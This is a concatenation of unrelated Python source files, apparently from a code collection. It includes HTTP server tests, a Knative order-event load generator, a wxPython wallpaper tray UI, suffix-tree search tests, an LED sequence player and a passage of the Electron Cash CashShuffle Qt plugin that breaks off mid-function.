for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_coroutine(self):
txt = self.visit(f"%E4%B8%AD%E6%96%87/coroutine?hey=KJ2")
assert txt == "Success! KJ2"
def test_filter(self):
res: http.client.HTTPResponse = self.visit(f"tuple?user_name=kj&pass=wu", return_type="RESPONSE")
assert "Res-Filter-Header" in res.headers
assert res.headers["Res-Filter-Header"] == "from-filter"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
def test_ws(self):
ws = websocket.WebSocket()
path_val = "test"
msg = "hello websocket!"
ws.connect(f"ws://127.0.0.1:{self.PORT}/ws/{path_val}")
ws.send(msg)
txt = ws.recv()
ws.close()
assert txt == f"{path_val}-{msg}"
|
genorders.py
|
from multiprocessing import Pool, TimeoutError
import time
import os
import requests
import sys
import itertools
import threading
import queue
import random
import uuid
import datetime
import json
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
endpoint = "http://orders-kn-channel.kcontainer.svc.cluster.local"
#endpoint = "http://springcontainerms-service.kcontainer.127.0.0.1.nip.io/orderevents"
eventtype = "OrderCreated"
def memoryless_idle_time(rate):
# TODO: Need implementation
return 1/rate
def gaussian_ilde_time(rate):
# TODO: Need implementation
return 1/rate
class Counter:
def __init__(self):
self.number_of_read = 0
self.counter = itertools.count()
self.lock = threading.Lock()
def inc(self):
next(self.counter)
def value(self):
with self.lock:
value = next(self.counter) - self.number_of_read
self.number_of_read += 1
return value
def createOrder():
addresses = [
{"street": "100 Main street", "city": "Oakland", "country": "USA", "state": "CA", "zipcode": "94501"},
{"street": "150 Meilong Road", "city": "Shanghai", "country": "China", "state": "", "zipcode": "200237"},
{"street": "476 9th Ave", "city": "NYC", "country": "USA", "state": "NY", "zipcode": "10018"},
{"street": "27-28, Rail Arch, New Mill Rd, Nine Elms", "city": "London", "country": "United Kingdom", "state": "", "zipcode": "SW8 5PP"},
{"street": "1628, 2095 Jerrold Ave", "city": "San Francisco", "country": "USA", "state": "CA", "zipcode": "94124"}
]
manuf = ['GoodManuf','OtherManuf']
products = ['Fresh product 1','Medical vaccin','Carrot','Fresh Product']
currentDate = datetime.datetime.now()
pickupDate = currentDate + datetime.timedelta(days=3)
expectedDeliveryDate = currentDate + datetime.timedelta(days=23)
# get a random index for pickup location
pickupIndex = random.randint(0, len(addresses)-1)
# get a random index for delivery location - and ensure not the same index of pickup
deliveryIndex = random.randint(0, len(addresses)-1)
while (pickupIndex == deliveryIndex):
deliveryIndex = random.randint(0, len(addresses)-1)
# get random indexes for the other arrays
manufIndex = random.randint(0, len(manuf)-1)
prodIndex = random.randint(0, len(products)-1)
payload = {
"orderID": str(uuid.uuid4()),
"productID": products[prodIndex],
"quantity": 1000,
"customerID": manuf[manufIndex],
"expectedDeliveryDate": expectedDeliveryDate.strftime("yyyy-MM-dd'T'HH:mm:ssXXX"),
"pickupDate": pickupDate.strftime("yyyy-MM-dd'T'HH:mm:ssXXX"),
"pickupAddress": addresses[pickupIndex],
"destinationAddress": addresses[deliveryIndex],
"status": "pending",
}
order = {
"timestamp": int(time.time() * 1000),
"version": 1,
"payload": payload,
"type": eventtype,
}
return order
def reqfunc():
#print("Sending:", knative_cluster)
#return requests.get(knative_cluster, headers={"Host": "greeter.knativetutorial.example.com"})
eventId = uuid.uuid4()
headers = {
"X-B3-Flags": "1",
"CE-SpecVersion": "1.0",
"CE-Type": "OrderEvent",
"CE-ID": str(eventId),
"CE-Source": "dev.knative.ordereventsource",
"Content-Type": "application/json"
}
order = json.dumps(createOrder())
# print(order)
return requests.post(endpoint, headers=headers, data=order)
sentRequests = Counter()
recvRequests = Counter()
succRequests = Counter()
pendingRequests = queue.Queue()
running = True
def generate_requests(pool, idle_time, rate, duration, final=True):
global sentRequests
global pendingRequests
global running
n = int(rate * duration)
for i in range(n):
res = pool.apply_async(func=reqfunc)
pendingRequests.put(res)
sentRequests.inc()
time.sleep(idle_time(rate))
if running != True:
break
if final:
running = False
def generate_ramp(pool, idle_time, rampup, srate, erate, stepsize, final):
global sentRequests
global pendingRequests
global running
rate = srate
while (srate < erate and rate < erate) or (srate > erate and rate > erate):
n = int(rate * stepsize)
for i in range(n):
res = pool.apply_async(func=reqfunc)
pendingRequests.put(res)
sentRequests.inc()
time.sleep(idle_time(rate))
if running != True:
break
rate += stepsize
if final:
running = True
def tracking():
global sentRequests
global recvRequests
global succRequests
global pendingRequests
global running
while running:
num = pendingRequests.qsize()
waiting = []
for _ in range(num):
try:
res = pendingRequests.get_nowait()
if res.ready():
response = res.get()
recvRequests.inc()
if response.status_code == 200:
succRequests.inc()
else:
waiting.append(res)
except queue.Empty:
break
except:
eprint("Error occur when trying to read the response...")
for res in waiting:
pendingRequests.put(res)
print(int(round(time.time() * 1000)), "Sent:", sentRequests.value(), "Received:", recvRequests.value(), "Successed:", succRequests.value())
time.sleep(1)
if __name__ == '__main__':
parallelism = 1
rate = 1.0
dist = "uniform"
duration = 10
if len(sys.argv) != 5:
eprint("Usage: python reqgen.py [parallelism] [rate] [duration] [uniform|memoryless|gaussian]")
exit(1)
else:
parallelism = int(sys.argv[1])
rate = float(sys.argv[2])
duration = int(sys.argv[3])
dist = sys.argv[4]
# Select arrival distribution
if dist == "uniform":
idle_time = lambda r: 1/r
elif dist == "memoryless":
idle_time = memoryless_idle_time
elif dist == "gaussian":
idle_time = gaussian_ilde_time
else:
print("Invalid arrival distribution:", dist)
exit(1)
if "eventtype" in os.environ:
eventtype = os.environ["eventtype"]
pool = Pool(processes=parallelism)
print("Generating new request, press [Ctrl + C] to stop")
running = True
sender = threading.Thread(target=generate_requests, args=(pool, idle_time, rate, duration))
sender.start()
tracker = threading.Thread(target=tracking)
tracker.start()
sender.join()
tracker.join()
|
ui.py
|
import os
import threading
import logging
import time
import wx
from .. import UI
class wxPython(UI):
def __init__(self, config):
super(wxPython, self).__init__(config)
self._initialize_gui()
self.app_paused = False
# App Control functions
def start_app(self):
logging.debug('Application and UI starting')
self.thread = threading.Thread(target=self.app.main)
self.thread.setDaemon(True)
self.thread.start()
self.ui_app.MainLoop()
def exit_app(self, *args, **kwargs):
self.tbicon.RemoveIcon()
self.ui_app.ExitMainLoop()
self.ui_app.Exit()
logging.debug('Application exited, goodbye!')
# wxEvents
def OnTaskBarRight(self, event):
self.tbicon.PopupMenu(self.menu)
def OnPauseSelected(self, event):
self.app.pause()
def OnUpdateTick(self, event):
# Set pause status tick and icon
if not (self.app_paused == self.app.is_paused):
self.menu.Check(self.pitem.GetId(), self.app.is_paused)
if self.app.is_paused:
self.tbicon.SetIcon(self.pause_icon, "wpmaker")
else:
self.tbicon.SetIcon(self.run_icon, "wpmaker")
self.app_paused = self.app.is_paused
# Set collage activation status ticks
self._set_active_collage_tics()
# Set interval status ticks
self._set_interval_tics()
def OnCollage(self, event):
collage = self.collage_submenu_class_names[event.GetId()]
self.app.toggle_collage(collage, activate=event.IsChecked())
active_collages = ''
for csi in self.collage_submenu_items:
if self.collage_submenu.IsChecked(csi):
active_collages += ',%s' % self.collage_submenu_items[csi]
self.app.update_config_file('options', 'collage-plugins', active_collages[1:])
def OnInterval(self, event):
interval = self.interval_submenu_items[event.GetId()]
self.app.next_generation += interval - self.app.config['update']
self.app.config['update'] = interval
if self.app.next_generation > time.time():
logging.debug('Generation interval changed, waiting until %s' %
time.strftime('%X', time.localtime(self.app.next_generation)))
else:
logging.debug('Generation interval changed, starting generation...')
self.app.update_config_file('options', 'update', '%d' % interval)
def OnFolderSelect(self, event):
path = self._getWPFolder()
for source in self.app.plugin_manager['Source']:
# module name of the plugin
module = source.__module__.split('.')[1]
# set the folder source to path
if module == 'folder':
source.set_path(path)
self.app.update_config_file('folder', 'source', path)
# Following methods are called from the application, via ui hooks
def check_config(self, save_config):
if not self.config['folder.source'] or self.config['folder.source'] == 'None':
logging.debug('Sources not set, prompting for folder')
path = self._getWPFolder()
self.config['folder.source'] = path
save_config('folder', 'source', path)
def app_quitting(self):
# Using CallAfter because app_quitting is called from another thread, and that's bad
wx.CallAfter(self.exit_app)
def app_initialized(self, app):
self.app = app
self._initialize_menu()
def collage_toggled(self, collage_name, activated):
""" Called when collage plugin is (de)activated """
for csi in self.collage_submenu_items:
if self.collage_submenu_items[csi] == collage_name:
self.collage_submenu.Check(csi, activated)
# Following methods are called from within the class
def _initialize_gui(self):
logging.debug('initializing gui...')
#setup app
self.ui_app = wx.PySimpleApp()
#setup icon object
self.run_icon = wx.Icon("wpmaker.ico", wx.BITMAP_TYPE_ICO)
self.run_icon.SetHeight(32)
self.run_icon.SetWidth(32)
self.pause_icon = wx.Icon("wpmaker_paused.ico", wx.BITMAP_TYPE_ICO)
self.pause_icon.SetHeight(32)
self.pause_icon.SetWidth(32)
#setup taskbar icon
self.tbicon = wx.TaskBarIcon()
self.tbicon.SetIcon(self.run_icon, "wpmaker")
wx.EVT_TASKBAR_RIGHT_UP(self.tbicon, self.OnTaskBarRight)
def _initialize_menu(self):
#menu
self.menu = wx.Menu()
# action menu items
self.gitem = self.menu.Append(wx.ID_ANY, '&Generate', 'Generate new wallpaper')
self.pitem = self.menu.Append(wx.ID_ANY, '&Pause', 'Pause wallpaper generation', kind=wx.ITEM_CHECK)
self.menu.Check(self.pitem.GetId(), False)
self.menu.Append(wx.ID_SEPARATOR)
# configuration menu items
self.sel_dir_item = self.menu.Append(wx.ID_ANY, '&Select Folder', 'Select a new wallpaper folder')
self._create_collage_menu()
interval = self.app.config['update']
self.interval_submenu = wx.Menu()
self.interval_submenu_intervals = [60, 300, 600, 1800, 3600]
self.interval_submenu_items = {}
if not interval in self.interval_submenu_intervals:
self.interval_submenu_intervals = [interval] + self.interval_submenu_intervals
submenu_item_index_start = 6000
submenu_item_index = submenu_item_index_start
for interval in self.interval_submenu_intervals:
if interval < 60:
interval_text = 'custom: %d sec' % interval
elif interval > 60 and submenu_item_index == 6000:
interval_text = 'custom: %d min' % (interval/60)
else:
interval_text = '%d min' % (interval/60)
self.interval_submenu_items[submenu_item_index] = interval
self.interval_submenu.Append(id=submenu_item_index,
text=interval_text,
kind=wx.ITEM_RADIO)
submenu_item_index += 1
self.ui_app.Bind(wx.EVT_MENU_RANGE, self.OnInterval, id=submenu_item_index_start, id2=submenu_item_index)
self.menu.AppendMenu(wx.ID_ANY, '&Interval', self.interval_submenu)
self.menu.Append(wx.ID_SEPARATOR)
self.qitem = self.menu.Append(wx.ID_EXIT, '&Quit', 'Quit application')
wx.EVT_MENU(self.tbicon, self.sel_dir_item.GetId(), self.OnFolderSelect)
wx.EVT_MENU(self.tbicon, self.gitem.GetId(), self.start_generating)
wx.EVT_MENU(self.tbicon, self.pitem.GetId(), self.OnPauseSelected)
wx.EVT_MENU(self.tbicon, self.qitem.GetId(), self.exit_app)
#gui update timer
self.timer = wx.Timer()
self.ui_app.Bind(wx.EVT_TIMER, self.OnUpdateTick, self.timer)
self.timer.Start(1000.0/24)
def _create_collage_menu(self):
submenu_item_index_start = 4000
submenu_item_index = submenu_item_index_start
self.collage_submenu = wx.Menu()
self.collage_submenu_items = {}
self.collage_submenu_class_names = {}
for cp in self.app.plugin_manager.plugins['Collage']:
class_name = cp.__name__
collage_name = cp.name
submenu_item_index += 1
self.collage_submenu_items[submenu_item_index] = collage_name
self.collage_submenu_class_names[submenu_item_index] = class_name
self.collage_submenu.Append(submenu_item_index,
collage_name,
collage_name,
kind=wx.ITEM_CHECK)
self._set_active_collage_tics()
self.ui_app.Bind(wx.EVT_MENU_RANGE, self.OnCollage, id=submenu_item_index_start, id2=submenu_item_index)
self.menu.AppendMenu(wx.ID_ANY, '&Collage', self.collage_submenu)
def _set_active_collage_tics(self):
self.active_collages = [c.__class__.__name__ for c in self.app.plugin_manager['Collage']]
for item_id in self.collage_submenu_class_names:
class_name = self.collage_submenu_class_names[item_id]
if class_name in self.active_collages:
self.collage_submenu.Check(item_id, True)
def _set_interval_tics(self):
interval = self.app.config['update']
for item_id in self.interval_submenu_items:
check = self.interval_submenu_items[item_id] == interval
self.interval_submenu.Check(item_id, check)
def _getWPFolder(self):
dialog = wx.DirDialog(None, message='Pick a directory', defaultPath=os.path.expanduser('~'))
path = None
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
dialog.Destroy()
return path
|
maintest.py
|
from suffixtree import *
import re
from threading import Thread
import threading
from memory_profiler import profile
import random
import time
import sys
charset = ['a','b','c','d','e','f','g']
strs = [
"abc",
"abcde",
"aabbcdeabc",
"123",
"1234",
"321",
"123321",
"hhhzzzzww",
"ttbb",
"ab1",
"12b",
"12",
"11",
"a1a",
"b",
"a2@",
"wwwr",
"AB1",
"aBC",
"cdD",
"CD",
"Cd"
]
tree = SuffixQueryTree(False)
tree.initStringsWithCache(strs)
allstr = tree.getStrings()
r = RegularExpSearch(tree)
charset = ['a','b','c','d','e','f','g']
def random_string(lens:int):
a = random.choices(charset,k=lens)
return "".join(a)
def create_dataset(n:int,l:int):
data =[
random_string(random.randint(0,5) + l)
for _ in range(n)
]
return data
def test1():
p = "[^bc23]+([b-c]+|2|3){2,}$"
t = r.searchString(p)
print("match strings: ",t)
t2 = [ i for i in strs if re.match(p,i) ]
print(t2)
assert set(t) == set(t2)
def test3():
print("Thread #: " + str( threading.get_ident() ))
p = "[^bc23]+([b-c]+|2|3){2,}$"
temp = 0
for i in range(1000):
s = r.st.getStrings()
t = r.searchPossibleStringIdx(p)
import time
time.sleep(0.01)
temp += len(t)
print(threading.get_ident(),i,len(t),len(s))
return temp
def test_simplesearch():
a = SimpleStringSearch(strs)
print(a.findString("a"))
print(a.findString("12"))
print(a.findString(["a", "b"]))
print(a.findString(["abc", "de"]))
print(a.findString(["aabbc", "de"]))
print(a.findString(["aabbc", "dde"]))
print(a.findString(["cd"]))
print(a.findString(["cd", "CD"]))
print(a.findString(["CD"]))
print("----------------------------------")
print(a.findString(["aabbc", "dde"],False))
print(a.findString(["cd"],False))
print(a.findString(["cd", "CD"],False))
print(a.findString(["CD"],False))
print(a.findString(["aB"],False))
print(a.findString(["C"],False))
print(a.findString(["C"],True))
print("----------------------------------")
print(a.findStringIdx("12"))
print(a.findStringIdx(["a", "b"]))
print(a.findStringIdx(["abc", "de"]))
print(a.findStringIdx(["aabbc", "de"]))
print(a.findStringIdx(["aabbc", "dde"]))
def benchmark_simplesearch():
import gc
n = 100000 * 50
test_n = 1000
data = create_dataset(n,20)
tl0 = time.time()
a = SimpleStringSearch(data)
tl1 = time.time()
print("finished dataset creation")
testdata = create_dataset(test_n, 3)
num = 0
t0 = time.time()
print(gc.get_stats())
for i in testdata:
#print(i)
temp = a.findStringIdx(i)
num += len(temp)
t1 = time.time()
print(num)
ctime = t1 - t0
print("creation time cost", tl1 - tl0,"total time cost", ctime, " avg time ", ctime / test_n)
print(gc.get_stats())
sys.stdin.readline()
def main():
t = r.searchPossibleStringIdx("(a\\d.|21)^")
result = list(map(lambda x:allstr[x],t))
print("possible: ",result)
t = r.searchString("^(a\\d.|21)")
print(t)
try:
t = tree.findStringIdx_wildCard(["1","12",SuffixQueryTree.CHAR_STRING_START])
print(t)
t = tree.findString_wildCard(["1","12",SuffixQueryTree.CHAR_STRING_END])
print(t)
except Exception as e:
print(e)
#test1()
#main()
def test2():
ts = [Thread(target = test3) for _ in range (5)]
for i in ts:
i.start()
for i in ts:
i.join()
#test2()
test_simplesearch()
#benchmark_simplesearch()
#from suffixtree.TestClass import *
#from suffixtree.TestClass import *
#import unittest
#unittest.main()
|
sequencePlayer.py
|
from threading import Thread
from time import sleep
import config as cfg
from sequencePlaylist import SequencePlaylist
from color import Color
from sequence import Sequence
class SequencePlayer:
def __init__(self):
self.currentplaylist = None
self.sequencethread = None
def runsequence(self, sequence: Sequence):
playlist = SequencePlaylist([sequence], sequence.name)
self.runplaylist(playlist)
def runplaylist(self, playlist: SequencePlaylist):
if self.currentplaylist == playlist:
return
if cfg.VERBOSE_LOGGING:
print("Running sequence {}".format(playlist.name))
self.currentplaylist = playlist
self.sequencethread = Thread(target=self.runthread)
self.sequencethread.start()
def stop(self):
self.stopcurrentplaylist()
sleep(2)
self.clear()
def runthread(self):
playlist = self.currentplaylist
loop = True
while loop:
sequence = playlist.getnext()
if playlist != self.currentplaylist:
break
for x in sequence.data:
if playlist != self.currentplaylist:
loop = False
break
self.setrangecolor(x.startid, x.endid, x.color, x.delay > 2)
if x.delay > 2:
sleep(max(x.delay, 10)/1000)
if playlist == self.currentplaylist:
self.sequencethread = None
def stopcurrentplaylist(self):
self.currentplaylist = None
self.sequencethread = None
print("Stopping running sequence")
def clear(self):
self.setrangecolor(0, cfg.LED_COUNT, Color.black())
def setrangecolor(self, start, end, color, write=True):
if start == end:
self.setcolor(start, color, False)
else:
for i in range(min(start, end), min(max(start, end), cfg.LED_COUNT)):
self.setcolor(i, color, False)
def setcolor(self, led, color, write=True):
pass
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.bitcoin import COINBASE_MATURITY
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from electroncash_plugins.shuffle.client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from electroncash_plugins.shuffle.comms import query_server_for_stats, verify_ssl_socket
from electroncash_plugins.shuffle.conf_keys import ConfKeys # config keys per wallet and global
from electroncash_plugins.shuffle.coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
u_value = utxo['value']
if not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
# for now we unconditionally disallow coinbase coins. See CashShuffle issue #64
# elif utxo['coinbase'] and (utxo['height'] + COINBASE_MATURITY > utxo_list.wallet.get_local_height()): # maturity check
# item.setText(5, _("Not mature"))
elif utxo['coinbase']: # we disallow coinbase coins
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
